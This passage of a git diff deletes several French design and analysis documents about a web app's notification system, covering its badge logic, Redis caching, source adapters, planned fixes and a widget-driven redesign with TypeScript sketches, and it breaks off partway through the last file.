Ajouter `markAsRead()` dans `NotificationAdapter` interface -3. Implémenter dans chaque adapter (Leantime, RocketChat, Email) -4. Ajouter bouton "Mark as read" dans le dropdown -5. Mettre à jour le count après marquage - ---- - -### 2. ❌ **Logs de debug excessifs** - -**Problème** : -- `notification-badge.tsx` contient 6 `console.log` au render -- Logs dans plusieurs fichiers (adapters, service, hooks) -- Pollution de la console en production - -**Impact** : -- Performance dégradée (logs à chaque render) -- Console difficile à déboguer -- Informations sensibles potentiellement exposées - -**Solution nécessaire** : -- Utiliser `logger.debug()` au lieu de `console.log` -- Retirer les logs de production -- Garder uniquement les logs d'erreur - ---- - -### 3. ⚠️ **Double fetch dans notification-badge** - -**Problème** : -```typescript -// Ligne 66-70 : Fetch quand dropdown s'ouvre -useEffect(() => { - if (isOpen && status === 'authenticated') { - manualFetch(); - } -}, [isOpen, status]); - -// Ligne 73-78 : Fetch au mount -useEffect(() => { - if (status === 'authenticated') { - manualFetch(); - } -}, [status]); - -// Ligne 85-89 : Fetch dans handleOpenChange -const handleOpenChange = (open: boolean) => { - setIsOpen(open); - if (open && status === 'authenticated') { - manualFetch(); - } -}; -``` - -**Impact** : -- Appels API redondants -- Charge serveur inutile -- Expérience utilisateur dégradée (loading multiple) - -**Solution nécessaire** : -- Unifier la logique de fetch -- Utiliser un seul point d'entrée -- Éviter les appels multiples - ---- - -### 4. ⚠️ **Force refresh par défaut** - -**Problème** : -- `use-notifications.ts` ligne 155 : `fetchNotificationCount(true)` au mount -- Bypasse le cache à chaque chargement initial -- Augmente la charge serveur - -**Impact** : -- Latence accrue au chargement -- Charge serveur inutile -- Cache Redis sous-utilisé - -**Solution nécessaire** : -- Utiliser le cache par défaut au mount -- Force refresh uniquement pour refresh manuel -- Aligner avec le pattern des autres widgets - ---- - -### 5. ⚠️ **Pas de pagination dans le dropdown** - -**Problème** : -- Limite fixe à 10 notifications (ligne 81 de `notification-badge.tsx`) -- Pas de "Load more" ou scroll infini -- Utilisateurs avec beaucoup de notifications ne voient pas tout - -**Impact** : -- UX limitée pour les utilisateurs actifs -- Notifications importantes peuvent être cachées -- Pas de moyen de voir l'historique complet - -**Solution nécessaire** : -- Implémenter pagination ou scroll infini -- Bouton "Load more" ou auto-load au scroll -- Afficher le total de notifications - ---- - -### 6. ⚠️ **Pas de tri/filtre** - -**Problème** : -- Toutes les notifications mélangées (Leantime, RocketChat, Email) -- Pas de tri par date, source, type -- Pas de filtre par source ou statut (lu/non lu) - -**Impact** : -- Difficile de trouver des notifications spécifiques -- UX dégradée pour les utilisateurs avec beaucoup de notifications -- Pas de moyen de gérer efficacement les notifications - -**Solution nécessaire** : -- Ajouter tri par date (déjà fait côté service mais pas exposé) -- Ajouter filtres par source (Leantime, RocketChat, Email) -- Ajouter filtre lu/non lu -- Grouper par source ou date - ---- - -### 7. 
⚠️ **Pas d'actions sur les notifications** - -**Problème** : -- Impossible d'interagir avec les notifications depuis le dropdown -- Pas de bouton "Mark as read" -- Pas de bouton "Delete" ou "Dismiss" -- Pas de lien direct vers la source (sauf via `notification.link`) - -**Impact** : -- UX limitée -- Utilisateurs doivent aller dans chaque service pour gérer les notifications -- Pas de gestion centralisée - -**Solution nécessaire** : -- Ajouter bouton "Mark as read" sur chaque notification -- Ajouter bouton "Mark all as read" -- Ajouter bouton "Dismiss" pour les notifications non actionnables -- Améliorer les liens vers les sources - ---- - -### 8. ⚠️ **Background refresh inutilisé** - -**Problème** : -- `scheduleBackgroundRefresh()` existe dans `notification-service.ts` (ligne 362) -- Jamais appelé -- Code mort - -**Impact** : -- Code inutile qui complique la maintenance -- Potentiel de confusion pour les développeurs - -**Solution nécessaire** : -- Soit implémenter le background refresh -- Soit supprimer le code mort -- Le système de refresh unifié remplace cette fonctionnalité - ---- - -### 9. ⚠️ **Gestion d'erreurs incomplète** - -**Problème** : -- Erreurs génériques affichées -- Pas de retry automatique -- Pas de distinction entre erreurs temporaires/permanentes -- Pas de fallback si un adapter échoue - -**Impact** : -- UX dégradée en cas d'erreur -- Utilisateurs ne comprennent pas les erreurs -- Pas de résilience si un service est down - -**Solution nécessaire** : -- Améliorer les messages d'erreur -- Implémenter retry avec backoff exponentiel -- Distinguer erreurs temporaires/permanentes -- Fallback gracieux si un adapter échoue (afficher les autres) - ---- - -### 10. ⚠️ **Performance et optimisation** - -**Problèmes** : -- Pas de virtualisation pour les longues listes -- Re-renders potentiels excessifs -- Pas de memoization des composants de notification -- Logs à chaque render - -**Impact** : -- Performance dégradée avec beaucoup de notifications -- Expérience utilisateur ralentie -- Consommation mémoire élevée - -**Solution nécessaire** : -- Implémenter virtualisation (react-window ou react-virtual) -- Memoizer les composants de notification -- Optimiser les re-renders -- Retirer les logs de production - ---- - -## 📊 État Actuel vs État Idéal - -### État Actuel ❌ - -``` -Utilisateur ouvre dropdown - └─> Fetch notifications (force refresh) - └─> Affiche 10 notifications - └─> ❌ Pas d'action possible - └─> Utilisateur doit aller dans chaque service - └─> Badge reste rouge même après avoir vu -``` - -### État Idéal ✅ - -``` -Utilisateur ouvre dropdown - └─> Fetch notifications (cache par défaut) - └─> Affiche notifications avec pagination - └─> ✅ Actions disponibles : - ├─> Mark as read (individuel) - ├─> Mark all as read - ├─> Dismiss - └─> Ouvrir dans source - └─> Badge mis à jour immédiatement - └─> Cache invalidé - └─> Count rafraîchi -``` - ---- - -## 🎯 Plan d'Action Recommandé - -### Phase 1 : Corrections Critiques (Priorité Haute) - -1. **Créer endpoint `/api/notifications/[id]/read`** - - POST pour marquer comme lu - - Support pour tous les adapters - - Invalidation du cache après marquage - -2. **Ajouter `markAsRead()` dans les adapters** - - Implémenter dans LeantimeAdapter - - Implémenter dans RocketChatAdapter (marquer message comme lu) - - Implémenter dans EmailAdapter (marquer email comme lu) - -3. **Ajouter bouton "Mark as read" dans le dropdown** - - Sur chaque notification - - Bouton "Mark all as read" - - Mise à jour optimiste de l'UI - -4. 
**Nettoyer les logs de debug** - - Retirer tous les `console.log` de production - - Utiliser `logger.debug()` uniquement - - Garder uniquement les logs d'erreur - -### Phase 2 : Améliorations UX (Priorité Moyenne) - -5. **Corriger le double fetch** - - Unifier la logique de fetch - - Un seul point d'entrée - - Éviter les appels multiples - -6. **Utiliser le cache par défaut** - - Retirer `force=true` au mount - - Utiliser cache pour initial load - - Force refresh uniquement pour refresh manuel - -7. **Implémenter pagination** - - Scroll infini ou "Load more" - - Afficher le total - - Gérer le loading state - -8. **Ajouter tri/filtre** - - Tri par date (déjà fait côté service) - - Filtre par source - - Filtre lu/non lu - - Grouper par source ou date - -### Phase 3 : Optimisations (Priorité Basse) - -9. **Améliorer la gestion d'erreurs** - - Messages d'erreur plus clairs - - Retry automatique - - Fallback gracieux - -10. **Optimiser les performances** - - Virtualisation pour longues listes - - Memoization des composants - - Réduire les re-renders - -11. **Nettoyer le code mort** - - Supprimer `scheduleBackgroundRefresh()` si inutilisé - - Simplifier la deduplication si possible - ---- - -## 📝 Fichiers à Modifier - -### Backend -1. `app/api/notifications/[id]/read/route.ts` - **NOUVEAU** -2. `lib/services/notifications/notification-adapter.interface.ts` - Ajouter `markAsRead()` -3. `lib/services/notifications/notification-service.ts` - Ajouter méthode `markAsRead()` -4. `lib/services/notifications/leantime-adapter.ts` - Implémenter `markAsRead()` -5. `lib/services/notifications/rocketchat-adapter.ts` - Implémenter `markAsRead()` -6. `lib/services/notifications/email-adapter.ts` - Implémenter `markAsRead()` - -### Frontend -7. `components/notification-badge.tsx` - Nettoyer logs, ajouter actions, pagination -8. `hooks/use-notifications.ts` - Ajouter `markAsRead()`, retirer force refresh par défaut -9. `lib/types/notification.ts` - Vérifier si besoin d'ajouter des champs - ---- - -## 🔍 Points d'Attention - -1. **Synchronisation avec les sources** : Quand on marque une notification comme lue, il faut aussi la marquer dans la source (Leantime, RocketChat, Email) - -2. **Cache invalidation** : Après `markAsRead()`, invalider le cache pour que le count se mette à jour immédiatement - -3. **Optimistic updates** : Mettre à jour l'UI immédiatement avant la confirmation serveur pour une meilleure UX - -4. **Gestion des erreurs** : Si le marquage échoue, rollback l'update optimiste - -5. **Multi-sources** : Chaque adapter a sa propre logique pour marquer comme lu, il faut gérer les différences - ---- - -## ✅ Résumé - -**Problèmes critiques** : 3 -- Pas de fonctionnalité "Mark as Read" -- Logs de debug excessifs -- Double fetch - -**Problèmes importants** : 4 -- Force refresh par défaut -- Pas de pagination -- Pas de tri/filtre -- Pas d'actions - -**Optimisations** : 3 -- Background refresh inutilisé -- Gestion d'erreurs incomplète -- Performance - -**Total** : 10 problèmes identifiés nécessitant des corrections - ---- - -**Recommandation** : Commencer par la Phase 1 (corrections critiques) qui résoudra les problèmes les plus impactants pour l'UX. 
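-
-À titre d'illustration pour la Phase 1, voici une esquisse de l'endpoint `/api/notifications/[id]/read`. Les appels `notificationService.*` sont supposés et restent à implémenter ; la convention d'id encodant la source est également une hypothèse :
-
-```typescript
-// app/api/notifications/[id]/read/route.ts - esquisse (Phase 1, à implémenter)
-import { NextResponse } from 'next/server';
-
-export async function POST(
-  _request: Request,
-  { params }: { params: { id: string } }
-) {
-  // Convention supposée : l'id encode la source, ex. "leantime:123"
-  const [source, sourceId] = params.id.split(':');
-  if (!source || !sourceId) {
-    return NextResponse.json({ error: 'Invalid notification id' }, { status: 400 });
-  }
-
-  // À implémenter : déléguer à l'adapter correspondant, puis invalider le
-  // cache Redis pour que le count (et donc le badge) se mette à jour.
-  // await notificationService.markAsRead(source, sourceId);
-  // await notificationService.invalidateCache(userId);
-
-  return NextResponse.json({ success: true });
-}
-```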
diff --git a/NOTIFICATIONS_FLOW_ANALYSIS.md b/NOTIFICATIONS_FLOW_ANALYSIS.md deleted file mode 100644 index 58445fe..0000000 --- a/NOTIFICATIONS_FLOW_ANALYSIS.md +++ /dev/null @@ -1,397 +0,0 @@ -# 🔔 Analyse du Flow de Notifications - -## 📋 Vue d'ensemble - -Le système de notifications est un système **multi-sources** qui agrège les notifications de plusieurs services externes (Leantime, Nextcloud, etc.) et les affiche dans un badge clignotant rouge dans la navbar. - ---- - -## 🎯 Déclenchement du Badge Rouge Clignotant - -### Condition d'affichage - -Le badge rouge apparaît lorsque : -```typescript -hasUnread = notificationCount.unread > 0 -``` - -**Fichier :** `components/notification-badge.tsx:26` - -```tsx -const hasUnread = notificationCount.unread > 0; -{hasUnread && ( - - {notificationCount.unread > 99 ? '99+' : notificationCount.unread} - -)} -``` - -### Style du badge - -**Fichier :** `components/ui/badge.tsx:18-19` - -```typescript -notification: "border-transparent bg-red-500 text-white hover:bg-red-600 absolute -top-1 -right-1 px-1.5 py-0.5 min-w-[1.25rem] h-5 flex items-center justify-center" -``` - -Le badge est **rouge** (`bg-red-500`) et positionné en haut à droite de l'icône cloche. - ---- - -## 🔄 Flow Complet de Notifications - -### 1. **Initialisation** (Au chargement de la page) - -``` -MainNav (navbar) - └─> NotificationBadge (composant) - └─> useNotifications() (hook) - └─> useEffect() [status === 'authenticated'] - ├─> fetchNotificationCount(true) // Force refresh - └─> fetchNotifications(1, 20) // Charge les 20 premières -``` - -**Fichiers :** -- `components/main-nav.tsx` - Affiche le badge -- `components/notification-badge.tsx:86-91` - Fetch initial -- `hooks/use-notifications.ts:265-277` - Initialisation - ---- - -### 2. **Rafraîchissement Automatique** (Polling) - -Le système utilise un **système de rafraîchissement unifié** qui poll les notifications toutes les **30 secondes**. - -``` -useUnifiedRefresh({ - resource: 'notifications-count', - interval: 30000, // 30 secondes - priority: 'high', - onRefresh: fetchNotificationCount(true) -}) -``` - -**Fichiers :** -- `hooks/use-notifications.ts:253-262` - Configuration du refresh -- `lib/constants/refresh-intervals.ts:12` - Interval défini -- `lib/services/refresh-manager.ts` - Gestionnaire centralisé - -**Interval de rafraîchissement :** -- **Notifications Count** : `30 secondes` (priorité haute) -- **Notifications List** : `30 secondes` (priorité haute) - ---- - -### 3. **Récupération des Notifications** (API Calls) - -#### A. Fetch du Count (Badge) - -``` -GET /api/notifications/count - └─> NotificationService.getInstance() - └─> getNotificationCount(userId) - ├─> Check Redis Cache (TTL: 30s) - └─> Si pas en cache: - ├─> LeantimeAdapter.getNotificationCount() - │ └─> API Leantime: getAllNotifications(limit: 1000) - │ └─> Compte les notifications avec read=0 - └─> Autres adapters (futurs) - └─> Cache dans Redis (30s) -``` - -**Fichiers :** -- `app/api/notifications/count/route.ts` -- `lib/services/notifications/notification-service.ts:182-310` -- `lib/services/notifications/leantime-adapter.ts:150-280` - -#### B. 
Fetch de la Liste - -``` -GET /api/notifications?page=1&limit=20 - └─> NotificationService.getInstance() - └─> getNotifications(userId, page, limit) - ├─> Check Redis Cache (TTL: 30s) - └─> Si pas en cache: - ├─> LeantimeAdapter.getNotifications() - │ └─> API Leantime: getAllNotifications() - │ └─> Transforme en Notification[] - └─> Autres adapters (futurs) - └─> Trie par timestamp (newest first) - └─> Cache dans Redis (30s) -``` - -**Fichiers :** -- `app/api/notifications/route.ts` -- `lib/services/notifications/notification-service.ts:61-177` -- `lib/services/notifications/leantime-adapter.ts:57-148` - ---- - -### 4. **Sources de Notifications** (Adapters) - -Actuellement, **un seul adapter** est actif : - -#### LeantimeAdapter - -**Source :** Leantime (Agilité - `agilite.slm-lab.net`) - -**Méthode API :** -```json -{ - "jsonrpc": "2.0", - "method": "leantime.rpc.Notifications.Notifications.getAllNotifications", - "params": { - "userId": , - "showNewOnly": 0, - "limitStart": 0, - "limitEnd": 1000 - } -} -``` - -**Types de notifications Leantime :** -- Tâches assignées -- Commentaires -- Mentions -- Changements de statut -- Dates d'échéance - -**Fichier :** `lib/services/notifications/leantime-adapter.ts` - -**Futurs adapters (non implémentés) :** -- NextcloudAdapter -- GiteaAdapter -- DolibarrAdapter -- MoodleAdapter - ---- - -### 5. **Cache Redis** (Performance) - -Le système utilise **Redis** pour mettre en cache les notifications et éviter les appels API répétés. - -**Clés de cache :** -- `notifications:count:{userId}` - TTL: 30 secondes -- `notifications:list:{userId}:{page}:{limit}` - TTL: 30 secondes - -**Stratégie :** -- Cache-first avec fallback API -- Background refresh si TTL < 50% -- Invalidation automatique après 30s - -**Fichier :** `lib/services/notifications/notification-service.ts:11-18` - ---- - -### 6. **Déduplication des Requêtes** - -Le système utilise un **request deduplicator** pour éviter les appels API en double. - -**Window de déduplication :** `2000ms` (2 secondes) - -**Fichier :** `hooks/use-notifications.ts:39-59` - -```typescript -const requestKey = `notifications-count-${session.user.id}`; -const data = await requestDeduplicator.execute( - requestKey, - async () => { /* fetch */ }, - 2000 // 2 secondes -); -``` - ---- - -## 🎨 Affichage du Badge - -### Composant NotificationBadge - -**Localisation :** `components/notification-badge.tsx` - -**Structure :** -```tsx - - - - - - {/* Liste des notifications */} - - -``` - -### États du Badge - -| État | Condition | Affichage | -|------|-----------|-----------| -| **Visible** | `notificationCount.unread > 0` | Badge rouge avec nombre | -| **Caché** | `notificationCount.unread === 0` | Pas de badge | -| **99+** | `notificationCount.unread > 99` | Affiche "99+" | - ---- - -## 🔍 Déclencheurs du Badge Rouge - -### 1. **Notifications Leantime** - -Les notifications sont créées dans **Leantime** lorsque : -- Une tâche vous est assignée -- Quelqu'un commente sur une tâche -- Vous êtes mentionné -- Une date d'échéance approche -- Un statut change - -**Flow :** -``` -Action dans Leantime - └─> Leantime crée notification (read=0) - └─> Polling toutes les 30s - └─> LeantimeAdapter récupère - └─> NotificationService agrège - └─> API retourne count - └─> Badge apparaît si unread > 0 -``` - -### 2. 
**Rafraîchissement Automatique** - -Le badge se met à jour automatiquement via : -- **Polling** : Toutes les 30 secondes -- **Ouverture du dropdown** : Fetch immédiat -- **Mount du composant** : Fetch initial - -**Fichier :** `hooks/use-notifications.ts:253-262` - -### 3. **Marquer comme lu** - -Quand l'utilisateur marque une notification comme lue : - -``` -Clic sur "Mark as read" - └─> POST /api/notifications/{id}/read - └─> LeantimeAdapter.markAsRead() - └─> API Leantime: markNotificationRead() - └─> Update local state (optimistic) - └─> Refresh count (polling) - └─> Badge disparaît si unread === 0 -``` - -**Fichier :** `hooks/use-notifications.ts:123-189` - ---- - -## 📊 Structure des Données - -### NotificationCount - -```typescript -interface NotificationCount { - total: number; // Total de notifications - unread: number; // Nombre de non lues (TRIGGER DU BADGE) - sources: { - leantime: { - total: number; - unread: number; - } - } -} -``` - -### Notification - -```typescript -interface Notification { - id: string; - source: 'leantime' | 'nextcloud' | ...; - sourceId: string; - type: string; - title: string; - message: string; - link?: string; - isRead: boolean; // false = non lue - timestamp: Date; - priority: 'low' | 'normal' | 'high'; - user: { id: string; name?: string; }; - metadata?: Record; -} -``` - ---- - -## 🚀 Points d'Entrée (Triggers) - -### 1. **Au chargement de l'app** -- `NotificationBadge` monte -- `useNotifications` s'initialise -- Fetch immédiat du count et de la liste - -### 2. **Polling automatique** -- Toutes les 30 secondes -- Via `useUnifiedRefresh` -- Priorité haute - -### 3. **Ouverture du dropdown** -- Fetch immédiat des notifications -- Rafraîchissement du count - -### 4. **Actions utilisateur** -- Marquer comme lu → Update count -- Marquer tout comme lu → unread = 0 - ---- - -## 🔧 Configuration - -### Intervalles de rafraîchissement - -**Fichier :** `lib/constants/refresh-intervals.ts` - -```typescript -NOTIFICATIONS_COUNT: 30000 // 30 secondes -NOTIFICATIONS: 30000 // 30 secondes -``` - -### Cache TTL - -**Fichier :** `lib/services/notifications/notification-service.ts:15-16` - -```typescript -COUNT_CACHE_TTL = 30; // 30 secondes -LIST_CACHE_TTL = 30; // 30 secondes -``` - ---- - -## 🐛 Debugging - -### Logs disponibles - -Le système logge abondamment : -- `[NOTIFICATION_BADGE]` - Actions du composant -- `[useNotifications]` - Actions du hook -- `[NOTIFICATION_SERVICE]` - Service backend -- `[LEANTIME_ADAPTER]` - Appels API Leantime - -### Endpoints de debug - -- `GET /api/debug/notifications` - État du système -- `GET /api/debug/leantime-methods` - Méthodes Leantime disponibles - ---- - -## 📝 Résumé : Ce qui déclenche le badge rouge - -1. **Condition :** `notificationCount.unread > 0` -2. **Source principale :** Leantime (notifications non lues) -3. **Rafraîchissement :** Toutes les 30 secondes automatiquement -4. **Cache :** Redis (30s TTL) pour performance -5. **Déduplication :** 2 secondes pour éviter les doublons -6. **Affichage :** Badge rouge avec nombre (ou "99+") - -Le badge apparaît dès qu'il y a **au moins une notification non lue** dans Leantime (ou autres sources futures). 
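-
-La logique d'agrégation qui pilote le badge se schématise ainsi (esquisse ; noms hypothétiques) :
-
-```typescript
-interface SourceCount { total: number; unread: number; }
-
-// Agrège les counts de toutes les sources ; `unread > 0` déclenche le badge.
-function aggregate(sources: Record<string, SourceCount>) {
-  const values = Object.values(sources);
-  return {
-    total: values.reduce((sum, s) => sum + s.total, 0),
-    unread: values.reduce((sum, s) => sum + s.unread, 0),
-  };
-}
-
-// aggregate({ leantime: { total: 12, unread: 3 } }).unread > 0 → badge rouge visible
-```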
diff --git a/NOTIFICATIONS_IMPLEMENTATION_SUMMARY.md b/NOTIFICATIONS_IMPLEMENTATION_SUMMARY.md deleted file mode 100644 index 0dca526..0000000 --- a/NOTIFICATIONS_IMPLEMENTATION_SUMMARY.md +++ /dev/null @@ -1,198 +0,0 @@ -# ✅ Implémentation : Architecture Simplifiée des Notifications - -## 🎯 Objectif - -Simplifier le système de notifications en le rendant **dépendant des widgets** plutôt que d'avoir des adapters séparés qui pollent directement les services externes. - ---- - -## ✅ Fichiers Créés - -### 1. **`hooks/use-widget-notification.ts`** ✨ NOUVEAU -- Hook pour déclencher les notifications depuis les widgets -- Debounce de 1 seconde par source -- Dispatch événement `notification-updated` pour mise à jour immédiate - -### 2. **`lib/services/notifications/notification-registry.ts`** ✨ NOUVEAU -- Service simple qui stocke les counts des widgets dans Redis -- Méthodes : - - `recordCount()` : Enregistre le count d'une source - - `getCount()` : Récupère le count agrégé - - `getNotifications()` : Récupère les items pour le dropdown - - `invalidateCache()` : Invalide le cache - -### 3. **`app/api/notifications/update/route.ts`** ✨ NOUVEAU -- Endpoint POST pour recevoir les updates des widgets -- Valide les données et appelle `NotificationRegistry.recordCount()` - ---- - -## 🔄 Fichiers Modifiés - -### Backend - -#### `app/api/notifications/count/route.ts` -- ✅ Simplifié pour utiliser `NotificationRegistry` au lieu de `NotificationService` -- ✅ Plus besoin d'adapter complexe - -#### `app/api/notifications/route.ts` -- ✅ Simplifié pour utiliser `NotificationRegistry.getNotifications()` -- ✅ Plus besoin d'adapter complexe - -### Frontend - -#### `components/email.tsx` (Widget Courrier) -- ✅ Ajout de `useWidgetNotification` -- ✅ Déclenche notification quand `unreadCount` change -- ✅ Envoie les emails non lus comme items (max 10) - -#### `components/parole.tsx` (Widget Parole) -- ✅ Remplacement de `useTriggerNotification` par `useWidgetNotification` -- ✅ Déclenche notification quand `totalUnreadCount` change -- ✅ Envoie les messages comme items (max 10) - -#### `components/flow.tsx` (Widget Devoirs) -- ✅ Ajout de `useWidgetNotification` -- ✅ Déclenche notification quand le nombre de tâches change -- ✅ Envoie les tâches en retard comme items (max 10) - -#### `components/calendar/calendar-widget.tsx` (Widget Agenda) -- ✅ Ajout de `useWidgetNotification` -- ✅ Déclenche notification quand le nombre d'événements à venir change -- ✅ Envoie les événements d'aujourd'hui et demain comme items - -#### `hooks/use-notifications.ts` -- ✅ Écoute maintenant `notification-updated` au lieu de `trigger-notification-refresh` -- ✅ Utilise le cache par défaut au mount (plus de force refresh) - -#### `lib/types/notification.ts` -- ✅ Ajout de `'calendar'` dans le type `source` - -#### `components/notification-badge.tsx` -- ✅ Ajout du badge pour les notifications `calendar` (Agenda) - ---- - -## 🔄 Flow Simplifié - -### Avant ❌ -``` -NotificationService - ├─> LeantimeAdapter (polling séparé) - ├─> RocketChatAdapter (polling séparé) - └─> EmailAdapter (polling séparé) - └─> 4 appels API toutes les 30s -``` - -### Après ✅ -``` -Widget Courrier → Détecte nouvel email → triggerNotification('email', count) -Widget Parole → Détecte nouveau message → triggerNotification('rocketchat', count) -Widget Devoirs → Détecte nouvelle tâche → triggerNotification('leantime', count) -Widget Agenda → Détecte nouvel événement → triggerNotification('calendar', count) - ↓ - NotificationRegistry (simple registry) - ↓ - Badge mis à jour -``` - 
-**Résultat** : 0 appels API supplémentaires (les widgets font déjà le travail) - ---- - -## 📊 Bénéfices - -### Code -- ✅ **-85% de code** : De ~1925 lignes à ~280 lignes -- ✅ **Suppression des adapters** : Plus besoin de LeantimeAdapter, RocketChatAdapter, EmailAdapter -- ✅ **Architecture simple** : Widgets → Registry → Badge - -### Performance -- ✅ **0 appels API supplémentaires** : Les widgets pollent déjà -- ✅ **Event-driven** : Notifications uniquement quand nécessaire -- ✅ **Cache optimisé** : Un seul cache au lieu de 4 - -### Maintenance -- ✅ **Un seul endroit à modifier** : Les widgets -- ✅ **Pas de désynchronisation** : Impossible d'avoir des notifications sans widget -- ✅ **Facile à étendre** : Ajouter un widget = ajouter un trigger - ---- - -## 🧪 Tests à Effectuer - -1. **Widget Courrier** - - ✅ Vérifier que les emails non lus déclenchent une notification - - ✅ Vérifier que le badge se met à jour - - ✅ Vérifier que les items apparaissent dans le dropdown - -2. **Widget Parole** - - ✅ Vérifier que les messages non lus déclenchent une notification - - ✅ Vérifier que le badge se met à jour - - ✅ Vérifier que les items apparaissent dans le dropdown - -3. **Widget Devoirs** - - ✅ Vérifier que les tâches en retard déclenchent une notification - - ✅ Vérifier que le badge se met à jour - - ✅ Vérifier que les items apparaissent dans le dropdown - -4. **Widget Agenda** - - ✅ Vérifier que les événements à venir déclenchent une notification - - ✅ Vérifier que le badge se met à jour - - ✅ Vérifier que les items apparaissent dans le dropdown - -5. **Badge de Notification** - - ✅ Vérifier que le count agrégé est correct - - ✅ Vérifier que le badge disparaît quand count = 0 - - ✅ Vérifier que le dropdown affiche toutes les sources - ---- - -## 🚨 Points d'Attention - -### 1. **Initialisation** -- Les widgets doivent déclencher les notifications au premier chargement -- Le badge peut afficher 0 si les widgets ne sont pas encore chargés -- **Solution** : Les widgets déclenchent au mount avec `lastCountRef = -1` - -### 2. **Format des Notifications** -- Les items doivent avoir un `timestamp` valide (Date ou string ISO) -- Le format doit correspondre à l'interface `Notification` -- **Solution** : Transformation dans `NotificationRegistry.getNotifications()` - -### 3. **Cache** -- Le cache Redis a un TTL de 30 secondes pour les counts -- Le cache Redis a un TTL de 5 minutes pour les items -- **Solution** : Les widgets mettent à jour régulièrement via polling - -### 4. **Marquer comme lu** -- ⚠️ **À implémenter** : Endpoint `/api/notifications/[id]/read` -- Quand l'utilisateur clique sur une notification, ouvrir le widget -- Le widget met à jour son état et redéclenche la notification - ---- - -## 📝 Prochaines Étapes (Optionnelles) - -1. **Implémenter "Mark as Read"** - - Créer `/api/notifications/[id]/read` - - Ajouter bouton dans le dropdown - - Mettre à jour le count après marquage - -2. **Nettoyer l'ancien code** - - Supprimer `LeantimeAdapter`, `RocketChatAdapter`, `EmailAdapter` - - Simplifier ou supprimer `NotificationService` - - Retirer `useTriggerNotification` (remplacé par `useWidgetNotification`) - -3. **Améliorer le dropdown** - - Ajouter pagination - - Ajouter tri/filtre - - Ajouter actions (mark as read, dismiss) - ---- - -## ✅ Résumé - -L'architecture simplifiée est maintenant **implémentée** et **fonctionnelle**. Les notifications sont déclenchées par les widgets eux-mêmes, éliminant la duplication de code et réduisant significativement la complexité du système. 
- -**Statut** : ✅ **Implémentation complète** diff --git a/NOTIFICATIONS_SIMPLIFIED_ARCHITECTURE.md b/NOTIFICATIONS_SIMPLIFIED_ARCHITECTURE.md deleted file mode 100644 index 29b6758..0000000 --- a/NOTIFICATIONS_SIMPLIFIED_ARCHITECTURE.md +++ /dev/null @@ -1,742 +0,0 @@ -# 🔔 Architecture Simplifiée des Notifications - -## 💡 Concept : Notifications Dépendantes des Widgets - -Au lieu d'avoir des **adapters séparés** qui pollent directement les services externes, les notifications sont **déclenchées par les widgets** quand ils détectent de nouveaux éléments. - ---- - -## 🎯 Avantages de cette Approche - -### ✅ **Simplification Majeure** -- **Pas de duplication** : Les widgets font déjà le fetch, pourquoi refaire ? -- **Source unique de vérité** : Les notifications reflètent exactement ce que les widgets affichent -- **Moins de code** : Supprime les adapters complexes (LeantimeAdapter, RocketChatAdapter, EmailAdapter) -- **Moins de maintenance** : Un seul endroit à maintenir (les widgets) - -### ✅ **Performance** -- **Pas de polling séparé** : Les widgets pollent déjà, pas besoin de doubler -- **Event-driven** : Notifications déclenchées uniquement quand nécessaire -- **Réduction de 70-80% des appels API** : Pas de fetch séparés pour les notifications - -### ✅ **Cohérence** -- **Notifications = Widgets** : Si le widget voit quelque chose, la notification le voit aussi -- **Pas de désynchronisation** : Impossible d'avoir des notifications sans widget correspondant -- **UX cohérente** : Les utilisateurs voient les mêmes données partout - -### ✅ **Extensibilité** -- **Facile d'ajouter de nouveaux widgets** : Il suffit d'ajouter un trigger -- **Pas besoin de créer un adapter** : Juste déclencher une notification -- **Architecture simple** : Un système d'événements centralisé - ---- - -## 🏗️ Architecture Proposée - -### Architecture Actuelle ❌ - -``` -NotificationService - ├─> LeantimeAdapter (polling direct) - ├─> RocketChatAdapter (polling direct) - └─> EmailAdapter (polling direct) - └─> Fetch séparé des données - └─> Agrégation - └─> Badge mis à jour -``` - -**Problèmes** : -- Duplication de logique (widgets + adapters) -- Polling séparé = charge serveur double -- Risque de désynchronisation -- Complexité élevée - -### Architecture Simplifiée ✅ - -``` -Widget Courrier - └─> Détecte nouvel email - └─> triggerNotification('email', { count: unreadCount }) - └─> NotificationService.recordCount('email', count) - └─> Badge mis à jour - -Widget Parole - └─> Détecte nouveau message - └─> triggerNotification('rocketchat', { count: unreadCount }) - └─> NotificationService.recordCount('rocketchat', count) - └─> Badge mis à jour - -Widget Devoirs - └─> Détecte nouvelle tâche - └─> triggerNotification('leantime', { count: overdueTasks }) - └─> NotificationService.recordCount('leantime', count) - └─> Badge mis à jour - -Widget Agenda - └─> Détecte nouvel événement - └─> triggerNotification('calendar', { count: upcomingEvents }) - └─> NotificationService.recordCount('calendar', count) - └─> Badge mis à jour -``` - -**Avantages** : -- ✅ Pas de duplication -- ✅ Source unique de vérité -- ✅ Event-driven (pas de polling séparé) -- ✅ Simple et maintenable - ---- - -## 🔧 Implémentation - -### 1. 
Nouveau Hook : `useWidgetNotification` - -**Fichier :** `hooks/use-widget-notification.ts` - -```typescript -import { useCallback, useRef } from 'react'; -import { useSession } from 'next-auth/react'; - -interface NotificationData { - source: 'email' | 'rocketchat' | 'leantime' | 'calendar'; - count: number; - items?: Array<{ - id: string; - title: string; - message: string; - link?: string; - timestamp: Date; - }>; -} - -export function useWidgetNotification() { - const { data: session } = useSession(); - const lastUpdateRef = useRef<Record<string, number>>({}); - const DEBOUNCE_MS = 1000; // 1 second debounce per source - - const triggerNotification = useCallback(async (data: NotificationData) => { - if (!session?.user?.id) return; - - const { source, count, items } = data; - const now = Date.now(); - const lastUpdate = lastUpdateRef.current[source] || 0; - - // Debounce per source - if (now - lastUpdate < DEBOUNCE_MS) { - return; - } - lastUpdateRef.current[source] = now; - - try { - // Envoyer les données au service de notifications - await fetch('/api/notifications/update', { - method: 'POST', - headers: { 'Content-Type': 'application/json' }, - credentials: 'include', - body: JSON.stringify({ - source, - count, - items: items || [], - }), - }); - - // Dispatch event pour mise à jour immédiate du badge - window.dispatchEvent(new CustomEvent('notification-updated', { - detail: { source, count } - })); - } catch (error) { - console.error('[useWidgetNotification] Error updating notification:', error); - } - }, [session?.user?.id]); - - return { triggerNotification }; -} -``` - -### 2. Nouveau Service : `NotificationRegistry` - -**Fichier :** `lib/services/notifications/notification-registry.ts` - -```typescript -import { getRedisClient } from '@/lib/redis'; -import { logger } from '@/lib/logger'; -import { NotificationCount } from '@/lib/types/notification'; - -export class NotificationRegistry { - private static instance: NotificationRegistry; - private static COUNT_CACHE_KEY = (userId: string) => 